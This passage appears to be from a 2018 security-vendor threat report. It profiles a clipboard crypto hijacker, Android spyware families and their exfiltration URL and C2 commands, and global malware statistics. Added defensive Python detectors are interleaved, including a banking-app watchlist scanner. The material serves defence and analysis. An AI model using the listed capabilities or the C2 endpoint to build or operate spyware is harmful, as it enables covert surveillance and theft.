A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world
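The substitution in the example above leaves a simple trace: the clipboard holds a different wallet address from the one the user copied, with no copy action in between. The following added example (not Comodo's code) detects that from clipboard telemetry; the monitoring agent and its 'user'/'poll' event stream are hypothetical, the event list is constructed, and the two Bitcoin addresses are the pair quoted in the report's example.

```python
"""Detect clipboard wallet-address substitution from clipboard telemetry.

Added example, not Comodo's code. A hypothetical monitoring agent records
two kinds of events: 'user' when the user explicitly copies something, and
'poll' when the agent reads the clipboard on a timer. A hijacker rewrites
the clipboard between those two moments, so a poll that shows a different
wallet address than the one the user copied is the tell. The event list
below is constructed; the two Bitcoin addresses are the pair quoted in the
report's example.
"""
import re
from collections import namedtuple

# Address shapes only (no checksum): legacy Base58 1.../3..., bech32 bc1..., Ethereum 0x...
ADDRESS_PATTERNS = {
    "btc": re.compile(r"(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[02-9ac-hj-np-z]{11,71})"),
    "eth": re.compile(r"0x[0-9a-fA-F]{40}"),
}

ClipEvent = namedtuple("ClipEvent", "ts source text")  # source: 'user' or 'poll'

SAMPLE_EVENTS = [
    ClipEvent(1, "user", "meeting notes for Monday"),
    ClipEvent(2, "poll", "meeting notes for Monday"),
    ClipEvent(3, "user", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),  # what the user copied
    ClipEvent(4, "poll", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),  # what the clipboard now holds
    ClipEvent(5, "user", "0x" + "ab" * 20),                       # constructed ETH address
    ClipEvent(6, "poll", "0x" + "ab" * 20),                       # unchanged: no alert
]


def wallet_kind(text: str):
    """Return 'btc', 'eth' or None for the whole clipboard text."""
    value = text.strip()
    for kind, rx in ADDRESS_PATTERNS.items():
        if rx.fullmatch(value):
            return kind
    return None


def detect_hijack(events) -> list:
    """Flag polls where a copied wallet address has been replaced by another of the same kind."""
    alerts = []
    last_user = None
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.source == "user":
            last_user = ev
            continue
        if last_user is None:
            continue
        kind = wallet_kind(last_user.text)
        if kind and ev.text.strip() != last_user.text.strip() and wallet_kind(ev.text) == kind:
            alerts.append({"ts": ev.ts, "kind": kind,
                           "copied": last_user.text.strip(), "found": ev.text.strip()})
    return alerts


def safe_to_paste(expected: str, clipboard: str) -> bool:
    """Last line of defence in a wallet UI: refuse a paste that differs from what was copied."""
    return expected.strip() == clipboard.strip()


if __name__ == "__main__":
    for alert in detect_hijack(SAMPLE_EVENTS):
        print(alert)
```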

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details and contacts (id, name, phone numbers and email address) of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server http://http.cgalim.com/admin/hr/pupu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. Also, it extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware to the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1 Telegram Groups انتخاب دھم

Version-2 Postrall Yes For Referendum انتخاب دھم

Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4 VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

- enable and disable the GPS services
- record audio and send it to the Command & Control server
- upload image files
- collect information about the installed applications
- collect browser data
- send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of the previous versions, it includes some additional tricks:

- extracts photos, audio and video
- records the screen
- executes shell commands
- records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it delivers a bundle of malicious abilities:

- takes control of the Bluetooth adapter
- extracts data about accounts, contact details and installed apps
- extracts data from the WhatsApp message DB and related keys
- uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Versions 1 to 3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

- extract the device information
- delete SMS
- set ringer mode
- monitor incoming SMS messages
- clear memory
- check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- extract contact details
- set Wi-Fi to always on

Version 2 can execute additional commands:

- send SMS and read outgoing SMS
- enable and disable the Wi-Fi connection
- access a location specified by the attackers
- make recordings
- make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App: Distribution

FlexiSpy: MBackup

HelloSpy: ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service

Mobile Spy: 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便, 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to the C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp

Here are some commands from its Command and Control server:

- contacts: get contact details and email ID
- Mute: set action to mute
- Mms: get MMS content
- info: get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.
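A defender-side triage check that the banking-app watchlists above (Xloader, FakeSpy and RedAlert all enumerate target banking packages) lend themselves to, added here as an example and not code from the report: it pulls printable strings out of an APK's dex-style byte blob and flags a sample that names several watchlisted banking packages together with SMS or contact permissions. The watchlist is the report's; the permission set, the scoring rule and the sample blobs are constructed for this example.

```python
import re

# Banking app package names the report lists as targets of Xloader and RedAlert.
BANKING_WATCHLIST = {
    "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.ibk.neobanking",
    "com.sc.danb.scbankapp", "com.shinhan.sbanking",
    "com.hanabank.ebk.channel.android.hananbank", "nh.smart",
    "com.epost.psf.sdsi", "com.kftc.kjbsmb", "com.smg.spbs",
    "de.postbank.finanzassistent", "pl.mbank", "aib.ibank.android",
}

# Permissions the spying capabilities described above require (assumed set):
# reading/sending SMS, reading contacts and call logs, recording audio, calling.
RISKY_PERMISSIONS = {
    "android.permission.READ_SMS", "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS", "android.permission.READ_CONTACTS",
    "android.permission.READ_CALL_LOG", "android.permission.RECORD_AUDIO",
    "android.permission.CALL_PHONE",
}

# Runs of 6+ printable ASCII bytes, the same idea as strings(1).
_STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")


def extract_strings(blob: bytes) -> list[str]:
    """Return printable ASCII runs of at least 6 bytes found in a binary blob."""
    return [m.group().decode("ascii") for m in _STRING_RE.finditer(blob)]


def triage(blob: bytes, min_targets: int = 3) -> dict:
    """Score a sample by the banking packages and risky permissions it names.

    Verdict rule (constructed heuristic): a sample that enumerates at least
    min_targets banking packages AND requests any risky permission is
    'suspicious'; everything else is 'clean'. A legitimate banking app names
    its own package, not a dozen competitors', which is why the count matters.
    """
    strings = extract_strings(blob)
    targets = sorted(pkg for pkg in BANKING_WATCHLIST
                     if any(pkg in s for s in strings))
    perms = sorted(p for p in RISKY_PERMISSIONS if p in strings)
    verdict = "suspicious" if len(targets) >= min_targets and perms else "clean"
    return {"targets": targets, "permissions": perms, "verdict": verdict}


# Constructed stand-ins for a classes.dex string pool; NUL bytes separate
# entries the way a real string table keeps them apart.
SAMPLE_SPYWARE_BLOB = (
    b"dex\n035\x00" + b"\x00" * 16
    + b"\x00android.permission.READ_SMS\x00android.permission.SEND_SMS\x00"
    + b"\x00com.wooribank.pib.smart\x00com.kbstar.kbbank\x00nh.smart\x00"
    + b"\x00de.postbank.finanzassistent\x00Lcom/example/Main;\x00"
)
SAMPLE_BENIGN_BLOB = (
    b"dex\n035\x00" + b"\x00android.permission.INTERNET\x00com.example.app\x00"
)

if __name__ == "__main__":
    for name, blob in (("spyware", SAMPLE_SPYWARE_BLOB),
                       ("benign", SAMPLE_BENIGN_BLOB)):
        print(name, triage(blob))
```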

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April 2018

4.2.2 May 2018

Chart: Android-targeted malware in May 2018

4.2.3 June 2018

Chart: Android-targeted malware in June 2018

5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest by the FBI of 10 people for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and leverages an open-source data compression algorithm, UCL, whose decompressor is just a few hundred bytes of code in length.
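A detection heuristic that follows from the description above, added here as an example and not Comodo's tooling: compressed or encrypted payloads have near-maximal byte entropy, so slicing a file into fixed windows and flagging the windows that exceed a threshold both signals a packed sample and locates the packed region. The sample inputs are constructed: a repeated text blob stands in for unpacked code, and seeded pseudo-random bytes stand in for a compressed or encrypted section; the window size, threshold and fraction are assumed defaults, not values from the report.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 1024,
                         threshold: float = 7.0) -> list[tuple[int, float]]:
    """Return (offset, entropy) for every window whose entropy reaches the threshold.

    Plain code and text sit around 4 to 6 bits per byte; compressed or encrypted
    data sits close to 8. A trailing chunk shorter than half a window is skipped
    because its entropy estimate is too noisy to be meaningful.
    """
    hits = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if len(chunk) < window // 2:
            continue
        e = shannon_entropy(chunk)
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def looks_packed(data: bytes, window: int = 1024, threshold: float = 7.0,
                 min_fraction: float = 0.5) -> bool:
    """Verdict: packed if at least min_fraction of the windows are high-entropy."""
    n_windows = max(1, len(data) // window)
    return len(high_entropy_windows(data, window, threshold)) / n_windows >= min_fraction


# Constructed samples (8 KiB each). The "packed" bytes come from a seeded PRNG so
# the result is reproducible; they stand in for a UCL/UPX-style compressed section.
PLAIN_SAMPLE = (b"mov eax, [ebp+8]; stand-in for unpacked code and its strings. " * 140)[:8192]
_rng = random.Random(7)
PACKED_SAMPLE = bytes(_rng.getrandbits(8) for _ in range(8192))
# A plain 2 KiB header followed by 6 KiB of packed data: the hits locate the boundary.
MIXED_SAMPLE = PLAIN_SAMPLE[:2048] + PACKED_SAMPLE[:6144]

if __name__ == "__main__":
    for name, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE),
                         ("mixed", MIXED_SAMPLE)):
        print(name, looks_packed(sample), high_entropy_windows(sample)[:3])
```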

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action, when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

